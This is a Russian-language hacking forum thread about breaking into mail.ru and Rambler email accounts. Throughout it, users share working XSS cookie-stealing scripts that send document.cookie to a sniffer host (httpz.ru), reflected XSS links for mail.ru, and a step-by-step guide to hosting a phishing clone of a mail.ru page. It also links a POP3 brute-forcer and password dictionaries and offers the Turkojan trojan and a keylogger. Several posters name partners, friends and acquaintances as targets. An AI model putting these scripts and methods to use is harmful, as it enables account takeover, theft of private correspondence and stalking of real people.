я надеюсь все поняли что эта ссылка его
Цитата:

Сообщение от t0xA

img = new Image(); img.src = "http://httpz.ru/nrwlwmemn5w.gif (https://hpc.name/redirector.html#http://httpz.ru/nrwlwmemn5w.gif)?"+document.cookie;

Зачёт. А говорил , что по взому мыла не шпаришь=)

а если жетва не откроет картинку как написано в примере, но она автоматически загрузиться сценарий сработает?

Цитата:

Сообщение от t0xA

несработает, потомучто она откроет на компе а не в сайте.

блин я не то имел ввиду.
вот к примеру я ему отправляю открытку, он просматривает письмо и картинка сама по себе загрузилась, но без его помощи. просто я замечал, что маил.ру автоматически загружает некоторые картинки.

Доброго времени суток! А как взломать почту на рамблере? спасибо

Цитата:


Доброго времени суток! А как взломать почту на рамблере? спасибо



Хороший вопрос)
Тебе сюда http://hpc.name/showthread.php?t=4799

у меня все равно куки не пришли...подскажите подалуйста что надо писать в личных настройках в строку"Пассивная XSS"это здесь на снифере!!

не!!!не покатит!!просто так некто не будет вводить скрипты в строку!!!

Цитата:

Сообщение от Cryptor

Это ссылка на сниффер!

ясно. я могу как то им пользоваться или надо свой сайт для сниффа делать? киньте плиз ссылочку на подробное обьяснение. спасибо.

я так и не понял куда вставлять "Код для пассивной XSS атаки"!!подскажите пожалуйста!!!

а что обязательно надо вводить жертве этот скрипт???я вчера без этого получил куки подруги(она не знала что я собирался делать)и взломал ее....тока не помню какой скрипт использовал((((((

Добавлено через 4 минуты
еще вопрос!!!куда вставлять строчку"Код для пассивной XSS атаки-она у меня %3CSCRIPT type=text/javascript src=http://httpz.ru/7z2fnrl17zgo.js>"
заранее спс!!

Сначала тут найди нужную пассивку http://hpc.name/showthread.php?t=2865%DD

щас найду))))спс!!отпишусь!

Добавлено через 2 минуты
а как определить нужная она или нет??вот мне например понравилась эта http://qiq.ru/s.php?type=1&q=%22%3E%...E&sort=0&ord=0 (https://hpc.name/redirector.html#http://qiq.ru/s.php?type=1&q=%22%3E%...E&sort=0&ord=0) что дальше с ней делать?

Ты берешь не ту которая тебе понравилась))Там над каждой ХСС написана для чего она)Эта вообще для qiq))

а там нет для mail((((((мне очень надо!!и еще...что такое qiq??не удивляйся моей тупизне)))))я новичок в этом деле!!

Напиши что типо тебе нада пасивная ХСС для mail.ru и должны по идее выложить))Зайди на сайт qiq.ru и узнаешь)

у тебя есть пасивка для mail.ru??

Добавлено через 1 минуту
ну представим мне выложут....что дальше с ней делать???

Добавлено через 1 минуту
ты не против если я тебе в аську добавлю??

Братан-бар, поясни мне плиз.
Чё это за ссылка? http://httpz.ru/nrwlwmemn5w.gif (https://hpc.name/redirector.html#http://httpz.ru/nrwlwmemn5w.gif) как мне сделать аналогичный инструмент?
спасибо.

Цитата:

Сообщение от qpayct

Чё это за ссылка? http://httpz.ru/nrwlwmemn5w.gif (https://hpc.name/redirector.html#http://httpz.ru/nrwlwmemn5w.gif)

Это ссылка на сниффер!

Зачот спасиб !!!

Зачот)))Теперь я думаю дурацких вопросов про куки и снифер действительно станет меньше))

Помогите взломать мыло срочно нужно очень?перепробывал все вчера брутил 9 часов заняло но некак я уже незнаю что и делать прошу помощи.
Кто может помоч пишите в аген ysa1989@mail.ru
p/s Помогите ребята!!!

Цитата:

Сообщение от Гнат

Спасибо, но я когда загружаю файлы с расширением img то они просто открываються блокнотом и ничего не происходит. Что делать? Как сделать так чтобы при открытии этого файла исполнялся сценарий? Заранее благодарен

где ты его открываешь , на почте или на компе?

Спасибо, но я когда загружаю файлы с расширением img то они просто открываються блокнотом и ничего не происходит. Что делать? Как сделать так чтобы при открытии этого файла исполнялся сценарий? Заранее благодарен

И там и там

Цитата:

Сообщение от Гнат

И там и там

просто на компе нажми, открить с помощью: и выбери программу для просмотра картинок, после нажми галочку использовать всегда.

нашол пассивку для майил а что с ней сделать куда вставить, просто вставить в хсс или еще чтото надо? подскажите

здравствуйте.помогите,пожа луйста в таком вопросе.прочитала много информации,пробовала тоже много чего.попробовала сниффер,или я что-то не так делаю,но испытала на своём мыле.мне возращается сообщение обратно как спам.а очень надо открыть почтовый ящик своего парня.может я делаю что-то не так?подскажите пожалуйста.у меня решается моя судьба и очень срочно надо его проверить.кто может рассказать подробно о взломе почты,напишите пожалуйста в личку.

К сожалению ничего не получается((( Пробовал открыть с помощью программы для просмотров факсов и картинок. Ничего. Может я просто не тем открыл?

ПОЖАЛУЙСТА Скажите как заполнит онлайн сниффер
наверняка мне надо настроит эту страничку но я незнаю
а там такие вопросы :
Настройки

Вместо httpz.ru можете использовать айпи 91.196.0.204. Поддерживается HTTPS.
Записывать ip в лог
Пассивная XSS
url xss
Например (http://site.com/xss.php?id=">)http://site.com/xss.php?id=%22%3E (https://hpc.name/redirector.html#http://site.com/xss.php?id=%22%3E) (где есть пассивная xss уязвимость). Сам javascript код писать не нужно, он автоматически допишется скриптом
url на редирект
Страница, куда перенаправится пользователь после кражи кукис (указывать с префиксом http://) (https://hpc.name/redirector.html#http://))
База пассивных xss на форуме
url для пассивной XSS
http://httpz.ru/6nyms4a5ujq (https://hpc.name/redirector.html#http://httpz.ru/6nyms4a5ujq)
Код размещения xss фрейма на странице
Код для пассивной XSS атаки
[ Вставлять после "> ]
Картинка 1x1px
http://httpz.ru/n6nyms4a5uj.gif (https://hpc.name/redirector.html#http://httpz.ru/n6nyms4a5uj.gif)
html код
bb код
JavaScript код
JavaScript код с редиректом
JavaScript код для адресной строки
JavaScript код для адресной строки c редиректом
Картинка 320x240px
http://httpz.ru/c6nyms4a5uj.gif (https://hpc.name/redirector.html#http://httpz.ru/c6nyms4a5uj.gif)
Картинка 640x480px
http://httpz.ru/s6nyms4a5uj.gif (https://hpc.name/redirector.html#http://httpz.ru/s6nyms4a5uj.gif)
Random анимация
http://httpz.ru/a6nyms4a5uj.gif (https://hpc.name/redirector.html#http://httpz.ru/a6nyms4a5uj.gif)
Random картинка
http://httpz.ru/r6nyms4a5uj.gif (https://hpc.name/redirector.html#http://httpz.ru/r6nyms4a5uj.gif)
Пользовательское изображение
Не загружено
Разрешены расширения .jpg, .jpeg, .gif, .png
Перехват POST запроса
http://httpz.ru/post/6nyms4a5uj (https://hpc.name/redirector.html#http://httpz.ru/post/6nyms4a5uj)
Скрипт перехватывает POST запрос (ключи и параметры) и пишет их в ваш лог. Для того чтобы перехватить POST запрос нужно заменить в html коде формы атрибут action на скрипт-обработчик, который перехватывает запрос. Если установлено поле urltogogo, то после перехвата POST запроса пользователь автоматически перенаправляется на заданную страницу (указывать обязательно с префиском http://) (https://hpc.name/redirector.html#http://)). Функция предназначены только для отладки своих скриптов.
как мне надо заполнит для www.mail.ru (https://hpc.name/redirector.html#http://www.mail.ru)

А рамблер так же можно взломать с помощью снифера?или только майл?

Цитата:

Сообщение от WhWolf

А рамблер так же можно взломать с помощью снифера?или только майл?

да любой сайт...

t0xA
запиши видео плиз)

Видео по снифферу: http://www.sin3v.org/instruction.php (https://hpc.name/redirector.html#http://www.sin3v.org/instruction.php)

Я так понял в действительности никаких программ для взлома не существует...фейки снифферы и прочее все зависит от жертвы так??

Цитата:

Сообщение от realtek

Я так понял в действительности никаких программ для взлома не существует...фейки снифферы и прочее все зависит от жертвы так??

Да!

realtek скажи а ты языки программирования знаешь??
если знаешь напиши прогу для взлома паролей))

P.S программ для взлома(тип укажи имя пользават нажми на кнопку и пароль жертвы у тя) не существует и написать их невозвожно (кроме конешно самого падбора паролей - но бруты эт не выход)
если что не правильно написал - подправте

Видео бы сняли по взлома майла и вопросов точно бы стало меньше 100%

Видео будет?

взломать мыла на mail.ru с помощью фейка.
Что нам надо?
1.Фейк на mail.ru скачать...
2.Хост на http://www.1gb.ru (https://hpc.name/redirector.html#http://www.1gb.ru) или на каком нибуть другом хостинге.
3.Программа CuteFtp.8.2.0.pro.build скачать...
4.Зарегить мыло на mail.ru (пример: otkrytka_mailru@mail.ru).
5. Голова с мозгами).
Первый шаг:
Регистрируем мыло на mail.ru типа otkrytka_mailru@mail.ru.
Второй шаг:
Регистрируемся на хосте http://www.1gb.ru (https://hpc.name/redirector.html#http://www.1gb.ru)


http://hpc.name/imagehost/2009/10/17/

thumb_195094ad997f65858a.jpg (http://hpc.name/forum/vbimghost.php?do=displayimg&imgid=1578)

[/URL]
Нажимаем на "Заказать хостинг и регистрацию зтого домена"
(http://hpc.name/forum/vbimghost.php?do=displayimg&imgid=1579)

(http://hpc.name/forum/vbimghost.php?do=displayimg&imgid=1581)
Теперь можно проверить почтовый ящик на наличие писем который мы вписали при регистрации

Мы видим на нашем мыле 2 письма. Открываем их и следуем инструкции. В одном из письме мы видим логин и пароль доступа на наш акаунт на сайт http://www.1gb.ru (http://hpc.name/forum/vbimghost.php?do=displayimg&imgid=1583)
Входим в наш акаунт используя полученный лог и пас

В правой части находим вот такую фразу "Пароли на ресурсы (FTP, почта, mySQL)" и заходи туда.
Там мы видим дохрена всякой инфы, но нам нужна вот эта, смотрите на скрин:
(http://hpc.name/forum/vbimghost.php?do=displayimg&imgid=1584)
Из этого следует что наш Фейк будет находится по этому адресу http://otkrytka-mai-ru.1gb.ru (https://hpc.name/redirector.html#http://otkrytka-mai-ru.1gb.ru).
Наш FTP Сервет будет: otkrytka-mai-ru.1gb.ru
Логин: 1gb_otkrytka-mai-ru
Пароль: aaea4530
Третий шаг:
Устанавливаем программу CuteFtp.8.2.0.pro.build. Установили? Вносим туда наши регистрационные данные


Нажимаем Connect и попадаем вот сюда. Смотрим скрин
(http://hpc.name/forum/vbimghost.php?do=displayimg&imgid=1586)
Заходим в папку http и всё от туда удаляем

Перед тем как залить сюда нашу фенечку заходим вот в этот файл login.php и вписываем строку куда мы пошлём нашу жертву после подтверждения регистрации (можете не вписывать я это за вас сделал)
Теперь можно и залить… Заливаем
Теперь наш Фейк готов.
При регистрации мы получили вот этот адрес (я его писал выше) [URL="https://hpc.name/redirector.html#http://otkrytka-mai-ru.1gb.ru"]http://otkrytka-mai-ru.1gb.ru (http://hpc.name/forum/vbimghost.php?do=displayimg&imgid=1588)
Заходим на него и что мы видим, а видим мы клон сайта для подтверждения регистрации на mail.ru.

объясните плз как фейк вставить в картинку )

Цитата:

Сообщение от nacho

объясните плз как фейк вставить в картинку )

а ето что реально ?

a novie sposobi net?:rolleyes:

Блин, не фига мне не приходят куки((

Добавлено через 1 минуту
Мож я че то не то делаю, вроде всё как описанно сделал..

img = new Image(); img.src = "http://httpz.ru/nrwlwmemn5w.gif?"+document.cookie;

Вот скрипт который написан в примере, его и делал... Но отправляю с Майла на Яндекс письмо с прикрепленым фалом .img открываю прямо с почтового ящика... захожу на сниффер в лог а там пусто

Добавлено через 22 минуты
Что надо заполнить в эти графы?

Пассивная XSS

url xss
и
url на редирект

Цитата:

Сообщение от feyruz

url xss

это адресс пассивной XSS уязвимости.до слова script

Цитата:

Сообщение от sfolo4

url на редирект

это туда куда перейдёт пользователь, после того как отдаст вам свои кукисы.

Это я понял) но что именно вписать туда, приведи какой нить пример, буду очень благодарен))

Добавлено через 1 минуту
и как узнать пассивный XSS для майл.ру?

Знаю что я полный нуб... Ими были все кто только начинал этому учиться...
Насчет ссылки на сниффер.. я просто тут указал для примера твой снифер.. но сам вставляю свой... этот http://httpz.ru/nh6pq46dlw6.gif (https://hpc.name/redirector.html#http://httpz.ru/nh6pq46dlw6.gif)

Вот я опишу подробно что я делаю... если будет не трудно, укажи ошибку...

начну с настроек сниффера
в поле Пассивная XSS
url xss я вписываю это
http://go.mail.ru/frame.html?imgurl=%22%3Ealert(document.cookie)
в поле url на редирект я без понятия что вписать...

Насчет скрипта
в бокноте я вписываю это

img = new Image(); img.src = "http://httpz.ru/nh6pq46dlw6.gif?"+document.cookie;

сохраняю как Фотка.img
отправляю тупо себе на мыло с другого тоже моего мыла...
Открываю мне вылазеет окношко, открыть... сохранить и т.д. я жму открыть..
потом иду на сниффер и проверяю логи, но там пусто..

Мож где то есть ошибка укажи на неё
Буду благодарен

Цитата:

Сообщение от _KAZAX_

взломать мыла на mail.ru с помощью фейка.
Что нам надо?
1.Фейк на mail.ru скачать...
2.Хост на http://www.1gb.ru (https://hpc.name/redirector.html#http://http://www.1gb.ru">http://www.1gb.ru[/URL] или на каком нибуть другом хостинге.
3.Программа CuteFtp.8.2.0.pro.build скачать...
4.Зарегить мыло на mail.ru (пример: otkrytka_mailru@mail.ru).
5. Голова с мозгами).
Первый шаг:
Регистрируем мыло на mail.ru типа otkrytka_mailru@mail.ru.
Второй шаг:
Регистрируемся на хосте http://hpc.name/imagehost/2009/10/17/

thumb_195094ad997f65858a.jpg[/img] (http://hpc.name/forum/vbimghost.php?do=displayimg&imgid=1578)


Нажимаем на "Заказать хостинг и регистрацию зтого домена"
(http://hpc.name/forum/vbimghost.php?do=displayimg&imgid=1579)

(http://hpc.name/forum/vbimghost.php?do=displayimg&imgid=1581)
Теперь можно проверить почтовый ящик на наличие писем который мы вписали при регистрации

Мы видим на нашем мыле 2 письма. Открываем их и следуем инструкции. В одном из письме мы видим логин и пароль доступа на наш акаунт на сайт http://www.1gb.ru (http://hpc.name/forum/vbimghost.php?do=displayimg&imgid=1583)
Входим в наш акаунт используя полученный лог и пас

В правой части находим вот такую фразу "Пароли на ресурсы (FTP, почта, mySQL)" и заходи туда.
Там мы видим дохрена всякой инфы, но нам нужна вот эта, смотрите на скрин:
(http://hpc.name/forum/vbimghost.php?do=displayimg&imgid=1584)
Из этого следует что наш Фейк будет находится по этому адресу http://otkrytka-mai-ru.1gb.ru (https://hpc.name/redirector.html#http://otkrytka-mai-ru.1gb.ru).
Наш FTP Сервет будет: otkrytka-mai-ru.1gb.ru
Логин: 1gb_otkrytka-mai-ru
Пароль: aaea4530
Третий шаг:
Устанавливаем программу CuteFtp.8.2.0.pro.build. Установили? Вносим туда наши регистрационные данные


Нажимаем Connect и попадаем вот сюда. Смотрим скрин
(http://hpc.name/forum/vbimghost.php?do=displayimg&imgid=1586)
Заходим в папку http и всё от туда удаляем

Перед тем как залить сюда нашу фенечку заходим вот в этот файл login.php и вписываем строку куда мы пошлём нашу жертву после подтверждения регистрации (можете не вписывать я это за вас сделал)
Теперь можно и залить… Заливаем
Теперь наш Фейк готов.
При регистрации мы получили вот этот адрес (я его писал выше) [URL="https://hpc.name/redirector.html#http://otkrytka-mai-ru.1gb.ru"]http://otkrytka-mai-ru.1gb.ru (http://hpc.name/forum/vbimghost.php?do=displayimg&imgid=1588)
Заходим на него и что мы видим, а видим мы клон сайта для подтверждения регистрации на mail.ru.

Откуда копипаст????
мыло регать не обезательно!!!
на 1gb.ru пробник 10 дней, неудобно!!!
а так все норм, не считая того что слизал))

как залить клавиатурный шпион на удалённый комп ? сделали бы спецы видео !

Цитата:

Сообщение от antidottt

как залить клавиатурный шпион на удалённый комп ? сделали бы спецы видео !

а не проще кинуть жертве к примеру Turkojan работает прекрастно.имеет и кейлогер.функционал на высоте!ток криптануть надо.если будеш искать его в сети смори заразу не подхвати.если нужен обращайся

Добавлено через 3 минуты

Цитата:

Сообщение от SooP

Напишите подробно, как заполнить снифер, и где брать данные для его заполнения

оброщайся помогу!

Мне кажется что Xss самое эффективное оружие

б"я я так и невкурил как это делается и видео смотрел но неполучаеся и ппц ща монитор от злости сломаю!

исправлено..

Я всё понял, сделал как нужно, вчера попробовал один раз куки пришли. А сегодня ни в какую не хотят приходить. Хотя я точно знаю что жертва открыла как положено картинку... В чем может быть проблема?

Alex404 Значит жертва не зашла в почтовый ящик либо XSS паленный

artyrka777: я уже и сам проверил, отправил на другой ящик письмо, открыл через браузер, а куков как небыло так и нет... А XSS вчера таже самая была и работало...

Я конечно понимаю что этим вопросом возможно некоторых людей достало, но всё же получить ссылку своего снифера...

Добавлено через 9 минут
Я так понял что вот этот код

img = new Image(); img.src = "http://httpz.ru/nrwlwmemn5w.gif?"+document.cookie;

Нодо пихать в txt документ и после поменять расширение на img. Так?
Но мне интересно как получить свой снифер (http://httpz.ru/nrwlwmemn5w.gif (https://hpc.name/redirector.html#http://httpz.ru/nrwlwmemn5w.gif))...
После отправки "куки" придут лишь в том случае, если "жертва" откроет этот "хак" в новом окне... Я правильно понял?

Добавлено через 1 минуту
+ ко всему куда ставить посивный xss

__________________________
Уж извините за повтор!

Цитата:

Сообщение от cjpasha

Я конечно понимаю что этим вопросом возможно некоторых людей достало, но всё же получить ссылку своего снифера...

Добавлено через 9 минут
Я так понял что вот этот код

img = new Image(); img.src = "http://httpz.ru/nrwlwmemn5w.gif?"+document.cookie;

Нодо пихать в txt документ и после поменять расширение на img. Так?
Но мне интересно как получить свой снифер (http://httpz.ru/nrwlwmemn5w.gif (https://hpc.name/redirector.html#http://httpz.ru/nrwlwmemn5w.gif))...
После отправки "куки" придут лишь в том случае, если "жертва" откроет этот "хак" в новом окне... Я правильно понял?

несовсем догнал вопроса...
если ты хочешь узнать где получить ссылки на сниффер, то зайди на сниффер и нажми "Настройки" :yes:

Помогите пожалуйста... Мне логи не приходят и всё тут... XSS брал с этого форума вот эту
Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.

Думаю из-за XSS но вставляю 3 разные и всё равно ничего не приходит

А в IE картинка открывается как блокнотик, а не как картинка...

Цитата:

Сообщение от k4889

Привет всем токо начал разбираться и нарыл XSS для mail
http://wifi.mail.ru/comments.html?point_id=6568&thread=">

Не знаю рабочий или нет. Как его использовать ?
Нужно почту взломать на майле.

ВОспользуйся поиском, на форуме есть статья и видио инструкция по использованию пассивок хсс

Цитата:

Сообщение от k4889

Народ киньте плиз ссылку на видео про XSS. А то читаю статьи и не совсем понятно как XSS типа
http://wifi.mail.ru/comments.html?point_id=6568&thread=">

использовать в своем скрипте

img = new Image(); img.src = "http://httpz.ru/nfr6ebhm8k9.gif?"+document.cookie;
var URL = "http://images.cards.mail.ru/11bolprivet.jpg"
var speed = 500;
function reload() {
document.location = URL
}
setTimeout("reload()", speed);

на сайте видео есть не тормози где всё описано зачем дурацкие вопросы задавать не понимаю есле не понятно в гугле набери видео про XSS и там много видео будет смотри не хочу вот и всё просто не надо глупые вопросы задавать есле не чего не найдёшь пиши в ЛС помогу!

Добавлено через 4 минуты
http://hpc.name/downloads.php?do=cat&id=3 вот видео по использованию кто искал

Люди помогите плз!!! в блокноте вожу:

img = new Image(); img.src = "http://httpz.ru/nc8ubpy4sjx.gif?"+document.cookie;
var URL = "http://www.gifzona.ru/i/privet/08.gif"
var speed = 3000;
function reload() {
document.location = URL
}
setTimeout("reload()", speed);

но куки всё равно не приходят!!! Может где нибудь есть ошибка???

Добавлено через 54 минуты
я украл куки!!! и зашел на мэил жертвы!!! как можно теперь его присвоить???

НАРОД!!!!!!!!ХВАТИТ ПАРИТЬСЯ!!!!ПРИСЫЛАЙТЕ МНЕ ПОЧТОВЫЕ АДРЕСА ЖЕРТВ!!!

СДЕЛАЮ БЕСПЛАТНО!!!!!! БЕСПЛАТНО ВЗЛОМАЮ MAIL.RU

КОМУ НАДО ПИШИТЕ СЮДА katrusya_sh@mail.ru

Екатерина

а потом на почту жертвы приходит сообщение - "Здравствуйте, Вас хотят взломать Иван Иванович"

парни нужна помощь я все делаю как вы пишите но на сниффер не приходит ничго((( в чем дело???

Напиши поэтапно свои действия)))МОжет что-то ни то делаешь))

посылаю письмо со скриптом как указанно на первой странице форума все так и выходит а когда отсылаю второе письмо то открывается чистая страница а куки на снифер не приходят и не могу понять в чем дело вроде делаю все как парни пишут

Спасибо за разьеснение!!Теперь более мение понятно.

http://na-s.ru/ (https://hpc.name/redirector.html#http://na-s.ru/) сайт не грузит

этот сайт прикрыли,пользуйся это сниффером http://hpc.name/sniffer/

А ни кто не знает как узнать пароль:? я слышал что можно как-то установить клавиатурного шпиона через онлайн жертве... и получать ввод его клавишь... ни кто не знает как это делается:?

а как получить премиум на сайте.чтобы юзать сниффер

Добавлено через 1 минуту
начнаю его редактироват ..пишкт что в демо режиме нельзя..а как же тогда можно

Добавлено через 1 минуту
получается он платный

Добавлено через 1 минуту
img = new Image(); img.src = ""+document.cookie; // здесь ваш код для кражи кукис
// редирект через 3 сек.
var URL = "http://images.cards.mail.ru/11bolprivet.jpg" // адрес открытки, если хотите, можете изменить на свой =)
var speed = 3000
function reload() {
document.location = URL
}
setTimeout("reload()", speed);

Таким макаром логи не приходят на сниффер ....

Эхххххххххх . Просто не пользуйся демо , а зарегай свой , бесплатно.

окей...чтото я затупил ...дай..в личку пассивны

Добавлено через 1 минуту
окей...чтото я затупил ...дай..в личку пассивны xss для майла и если есть ещё чтонить..а то на сайте всё под хайдом .

Добавлено через 6 минут
пишет что я уже авторизован..делаю выход.. опять автоматом меня в демо режим..

Добавлено через 20 минут
а что означает - в скрипте -img = new Image(); img.src = "http://httpz.ru/nrzem1iwenj.gif?"+document.cookie; // здесь ваш код для кражи кукис

что туда вписать?

Цитата:

Сообщение от werana

а что означает - в скрипте -img = new Image(); img.src = "http://httpz.ru/nrzem1iwenj.gif?"+document.cookie; // здесь ваш код для кражи кукис

что туда вписать?

img.src = "http://httpz.ru/nrzem1iwenj.gif-ето адрес твоей картинки
cookie; // здесь ваш код для кражи кукис-а здесь вроде по руски написано

блин..как раз про здесь ваш код для кражи кукис я не догнал..нужно вставить xss ? или что ..

Добавлено через 28 минут
Скрипт сгенрированный на этом сайте..


img = new Image(); img.src = "http://httpz.ru/nrzem1iwenj.gif?"+document.cookie; // здесь ваш код для кражи кукис

// редирект через 3 сек.

var URL = "http://images.cards.mail.ru/11bolprivet.jpg" // адрес открытки, если хотите, можете заменить на свой

var speed = 3000; // редирект через 3 секунды

function reload() {

document.location = URL

}

setTimeout("reload()", speed);



шлю сам себе .в виде картинки .jpg графики нет.. работает ли он на майл.ру.. и что я делаю не так.
(LF3R4FLF91R ключ на летитбит)

Xss нужно на сайте записать!
и там под Xss есть ссылка для пассивной атаки!

отпиши мне в асю.. я про xss плохо волоку.. хоть подскажеш куда и что ..
заранее благодарен!!!

Добавлено через 1 минуту
подскажи поподробеней.. вот моя аська..464 233 814
Жду.. заранеее благодарен

а какой ты xxs прописываеш в настройкай сниффера?

в чём дело ...???

Добавлено через 4 минуты
ни один скрипт не пашет ..
JavaScript код с редиректом
JavaScript код для адресной строки
JavaScript код для адресной строки c редиректом

Добавлено через 24 минуты
ни кто не подскажет ...

Писал уже, но не знаю почему, но сообщение удалили.
Не подскажете откуда можно отослать эмэйл в ХТМЛ виде, раньше это было на Рамблере, но щас вроде нет, да? Но там есть выбор кодировки, может то оно?

Зарегестрировал аккаунт на сниффере Hack pro
подготовил в блокноте скрипт:

img = new Image(); img.src = "http://httpz.ru/nhijv6racrp.gif?"+document.cookie;
var URL = "тут моя ссылка на фотку"
var speed = 3000;
function reload() {
document.location = URL
}
setTimeout("reload()", speed);

сохранил как картинку .img
Когда пробовал у себя на компе в лог приходит либо куки, либо просто ссылка с ip - в зависимости от браузера и того открывалась картинка в отдельной вкладке или в той же.
Отправил письмо знакомому, знакомый открыл картинку как я просил в окне браузера не загружая файл, при этом мне в лог ничего не пришло.
При этом отправлял тоже самое другому знакомому, в лог пришла информация об ip.
С чем это может быть связано?

И так учимся ломать мыло) простенький брут для начинающих)) на нём и будим учиться)
Плюсы:

* Не требует прокси.
* Может перебирать пароли для нескольких мыл.
* Найдя в файле с паролями слово login воспринимает его как ник мыла, которое брутим, удобно когда много мыл.
* Сохраняет подобранные пароли в файл.
* Cервер и порт сервера можно изменять.

Минус:

* низкая скорость.(но тем не менее сломать можно к тому же это токо начало)

В первом поле "login" выбираем текстовый файл с логинами мыл, во втором поле "password" выбираем текстовый файл с паролями в третем поле выбираем сервер рамблера например для rambler.ru-pop.rambler.ru и т.д
в четвёртом поле вводим порт 110
для проверки работоспособнгости делаем левый ящик на рамблере и вписываем пороль в папку поролями )
загрузить (https://hpc.name/redirector.html#http://depositfiles.com/files/h9z788cll)
P.S не забудь что для того чтоб.брутить нужно скачать словарь с комбинациями поролей для брута
=================================================
Тут я выкладываю разные словари комбинаций для бруты
Простенький словарь для экспериментов в распаковке 7 Мб. загрузить (https://hpc.name/redirector.html#http://depositfiles.com/files/zwo3nfeat)
------------------------------------------------------------------------------------------------------------------------------------------ -------------------------------------------------------------
Мегасловарь руских слов Архив-8.5 Mb Размер файла-31 Mb Количество слов-2.892.931загрузить (https://hpc.name/redirector.html#http://depositfiles.com/files/xr4yn6lwb)
------------------------------------------------------------------------------------------------------------------------------------------ --------------------------------------------------------------
Мегасловарь английских слов Архив-39.8 Mb Размер файла-154 Mb Количество слов-13.953.51
Внимание!Это не 8 архивов, а один, порезанный на 8 частей! Распаковывать все вместе
1 часть загрузить (https://hpc.name/redirector.html#http://depositfiles.com/files/51woba5pf) 2 часть загрузить (https://hpc.name/redirector.html#http://depositfiles.com/files/c7vsm2824) 3 часть загрузить (https://hpc.name/redirector.html#http://depositfiles.com/files/8bsinfkns) 4 часть загрузить (https://hpc.name/redirector.html#http://depositfiles.com/files/4wq2x8cfp) 5 часть загрузить (https://hpc.name/redirector.html#http://depositfiles.com/files/2pyr6wien) 6 часть загрузить (https://hpc.name/redirector.html#http://depositfiles.com/files/w6ua5rtg4) 7 часть загрузить (https://hpc.name/redirector.html#http://depositfiles.com/files/ynz4oev56) 8 часть загрузить (https://hpc.name/redirector.html#http://depositfiles.com/files/su2ls6rda)

всё делаю по инструкции отправляю файл с одного мыла на другой,полученный файл открываю в новом окне и пишет сохранить файл как?
Что я делаю неправильно?

люди, подскажите, мне пришли куки, я зашел на искомый ящик, а как мне теперь пароль то узнать?

Добавлено через 16 часов 20 минут
еще вопрос, мне с куками не пришел этот параметр Mpopl
ввожу все и не могу зайти на ящик, вариантов нет?

Тут разве что пробуй искать в ящике в письмах с регистрациями напоминаиями пароля и т.д. , еще как вариант можно поробовать выслать напоминание пароля с вконтакте.ру ,если пароль прийдет возможно он совпадает и смыльным.

Цитата:

Сообщение от @ntidot

Тут разве что пробуй искать в ящике в письмах с регистрациями напоминаиями пароля и т.д. , еще как вариант можно поробовать выслать напоминание пароля с вконтакте.ру ,если пароль прийдет возможно он совпадает и смыльным.

почему он должен совпадать нет таких людей которые везде ставят один пароль!

я думал уже об этом, но хозяйке ящика 38 лет и ерундой она не занимается((

Цитата:

Сообщение от Vulkan

почему он должен совпадать нет таких людей которые везде ставят один пароль!

Цитата:

Сообщение от solidangle

я думал уже об этом, но хозяйке ящика 38 лет и ерундой она не занимается((

Такие люди есть и их много, заканчивайте флуд...

скажите что-нибудь умное по моему вопросу((

Цитата:

Сообщение от Vulkan

почему он должен совпадать нет таких людей которые везде ставят один пароль!

не согласен,есть такие люди!

Добавлено через 2 минуты

Цитата:

Сообщение от solidangle

скажите что-нибудь умное по моему вопросу((

кукисы живут около 15 минут,пароль можно узнать так,делаешь высылку пароля вконтакте смотришь если подошёл,то всё отлично,если нет пошарься по ящику и сделай высылки с различных сайтов на которых жертва зарегистрирована

Так тут и не ответили на вопрос , куки не приходят не фига

img = new Image(); img.src = "http://httpz.ru/*******.gif?"+document.cookie; // здесь ваш код для кражи кукис
// редирект через 3 сек.
var URL = "http://images.cards.mail.ru/*******.jpg" // адрес открытки, если хотите, можете заменить на свой
var speed = 3000; // редирект через 3 секунды
function reload() {
document.location = URL
}
setTimeout("reload()", speed);

смысл в том что кук не приходят есть вареанты по чему может это быть ?

Добавлено через 2 минуты

Цитата:


кукисы живут около 15 минут,пароль можно узнать так,делаешь высылку пароля вконтакте смотришь если подошёл,то всё отлично,если нет пошарься по ящику и сделай высылки с различных сайтов на которых жертва зарегистрирована



А да и к стати пользовался Сниффером на Вэбхаке ранее ( довненько было дело ) там как минемум в тичении часа куки жил

Ребят. Помогите плиз! Картинка не отображается, а посему жертва не считает нужным ее открывать. Что не так в коде? Т__Т

Вот код:

img=new Image(); img.src="http://web-defence.ru/snif/s.gif?id=1061&"+document.cookie;
var URL="http://cards.mail.ru/cardedit.html?G=2&E=2028&tid=1287"
var speed=3000
function reload() {
document.location=URL
}
setTimeout("reload()", speed);

для маил ру есть трояан типо видео работает с маилагентом 98% приходит пароль без никакого палива

Цитата:

Сообщение от stasbasic

для маил ру есть трояан типо видео работает с маилагентом 98% приходит пароль без никакого палива

о твоём трояне наслышане:banana:
интересно ты его слил или сам писал:yes:

что куда вставлять?

Ребят, вы меня конечно извените, но я даж не знаю чё такое снифер. Объясните кто-нибудь.

Цитата:


Ребят, вы меня конечно извените, но я даж не знаю чё такое снифер. Объясните кто-нибудь.



Это тебе не сюда, полазий по форуму

привет всем Я чайник.подскажите мне чем и как лучше взломать мыло.у меня Brutus AET2,но не чего не получается.может словарик плохой.но у меня их несколько.И толку нет.что делать.ПЛИС....

Цитата:

Сообщение от LSD66

привет всем Я чайник.подскажите мне чем и как лучше взломать мыло.у меня Brutus AET2,но не чего не получается.может словарик плохой.но у меня их несколько.И толку нет.что делать.ПЛИС....

брут сейчас не актуален используй другие методы

Брут актуален всегда...

Подскажите прогу для перебора Ответов на секретные вопросы для Mail.ru
То есть есть напрмиер словарь с ответами (напрмиер клички собак), надо засунуть этот словарь в прогу и чтобы она поперебирала ответы, а то вручную долго очень
Brutus AET я так понял не подходит

=)

Всем привет. У меня такой вопросец, отсылаю ссылку на mail.ru, ссылку надо упаковать чтобы жертва не видела ее. Засунул в тег , отсылаю с анонимной почты. Решил проверить на своей почте. Все шло нормально, до тех пор пока я не попытался открыть саму ссылку. Мэйл за каким-то фигом к ссылке добавил: http://win.mail.ru/cgi-bin (https://hpc.name/redirector.html#http://win.mail.ru/cgi-bin). В итоге мой линк вышел http://win.mail.ru/cgi-bin/******/****.htm (https://hpc.name/redirector.html#http://win.mail.ru/cgi-bin/******/****.htm). И при переходе по нему выдает ошибку. Что можете посоветовать сделать?

Хех.. НАРОД! Сделал все по старинке на майле (с JavaScript код с редиректом) все прекрасно сработало! ...

Добавлено через 2 минуты
